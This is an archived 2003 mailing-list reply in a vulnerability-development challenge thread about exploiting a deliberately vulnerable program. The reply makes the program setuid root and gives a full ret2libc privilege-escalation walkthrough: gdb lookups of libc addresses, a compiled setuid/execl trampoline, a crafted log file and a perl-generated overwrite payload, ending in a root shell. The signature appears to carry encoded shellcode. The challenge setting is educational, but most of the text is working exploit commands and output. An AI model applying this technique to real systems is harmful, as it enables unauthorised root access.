Re: [Vuln-dev Challenge] Challenge #2

From: Jose Ronnick (matrixat_private)
Date: Sat May 24 2003 - 18:03:03 PDT

Next message: Janus N.: "Re: [Vuln-dev Challenge] Challenge #2"

Previous message: Janus N.: "Re: N00b questions :\"
In reply to: spacewalker: "Re: [Vuln-dev Challenge] Challenge #2"
Next in thread: D.: "[Vuln-dev Challenge] Challenge #2"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Sat, 24 May 2003 13:11:13 +0200
spacewalker <spacewalkerat_private> wrote:

> 0wn3d. Ret into libc exploitation, no setuid() stuff, quite simple in
> fact.
> 
> The challenge would have been interesting if the fopen() wasn't "a" but
> create and write from beginning.
> 
> $ ./exploit 
> Using system address 0x4005f531
> And overwriting printf got at 0x0804971c starting by 0x08049713
> sh-2.05b$ exit
> exit
> Segmentation fault
> 
> default offset is 5 (could vary).
> spacewalker
> 		/* Say NO to target[n] exploits ! */
> 

I agree about using ret2libc... this one was easy enough you shouldn't have used shellcode..   =)  however...  you forget that system() executes through /bin/sh which will drop privs.  Try making the vuln program suidroot and then run your exploit...  still no root shell.  =/   close.. but it really doesn't give you much more since you already had a basic user shell before you executed the sploit..  

Here's one way to do it using ret2libc to avoid the privilege dropping..  (same as the encrypted post earlier, plaintext now since the cat's outta the bag anyways)..  There's also a way to do with without building a trampoline prog to bounce off of.. just chaining libc calls...  If no one else posts a solution doing it, I'll do it an post it later...

matrix@overdose vuln-dev $ gcc -o vuln2 vulndev2.c 
matrix@overdose vuln-dev $ sudo chown root.root vuln2
matrix@overdose vuln-dev $ sudo chmod +s vuln2
matrix@overdose vuln-dev $ echo 'main(){sleep();execl();}' > e.c;gcc -o e.x e.c;gdb -q e.x; rm e.*
(gdb) break main
Breakpoint 1 at 0x804836e
(gdb) run
Starting program: /home/matrix/research/vuln-dev/e.x 

Breakpoint 1, 0x0804836e in main ()
(gdb) p sleep
$1 = {<text variable, no debug info>} 0x400ce760 <sleep>
(gdb) p execl
$2 = {<text variable, no debug info>} 0x400cecc0 <execl>
(gdb) quit
The program is running.  Exit anyway? (y or n) y
matrix@overdose vuln-dev $ objdump -R vuln2 | grep exit
0804974c R_386_JUMP_SLOT   exit
matrix@overdose vuln-dev $ echo 'main(){setuid(0);setgid(0);execl("/bin/sh","/bin/sh",0);}' > t.c;gcc -o t.ramp t.c;
matrix@overdose vuln-dev $ pwd   
/home/matrix/research/vuln-dev
matrix@overdose vuln-dev $ printf "\x60\xe7\x0c\x40/home/matrix/research/vuln-dev/t.ramp\x00" > db.log
matrix@overdose vuln-dev $ ./vuln2 `perl -e 'print "\x4c\x97\x04\x08"x31 . "\xc0\xec\x0c\x40" . "\x50\x97\x04\x08"x3;'` h
`į
  @/home/matrix/research/vuln-dev/t.ramp
root@overdose vuln-dev # id
uid=0(root) gid=0(root) groups=100(users),10(wheel),18(audio),250(portage)
root@overdose vuln-dev # 

-- 
%JOSE_RONNICK%50,:-dddd-0EEb-pVVyP\-1111-jjjj-yNNN-_4HUP-qq0q-02%r-_Z%JP-%Iwp-5kyyP-n5nn-aTTa-1271P-4ttt-/888-3tSMP-bbnb-L8wL-kMwgP-3Hy3-rqzWP-m%m8-h4x--v%r5P-S7S7-g7g7-F2u2PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP

application/pgp-signature attachment: stored

Next message: Janus N.: "Re: [Vuln-dev Challenge] Challenge #2"
Previous message: Janus N.: "Re: N00b questions :\"
In reply to: spacewalker: "Re: [Vuln-dev Challenge] Challenge #2"
Next in thread: D.: "[Vuln-dev Challenge] Challenge #2"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat May 24 2003 - 20:37:37 PDT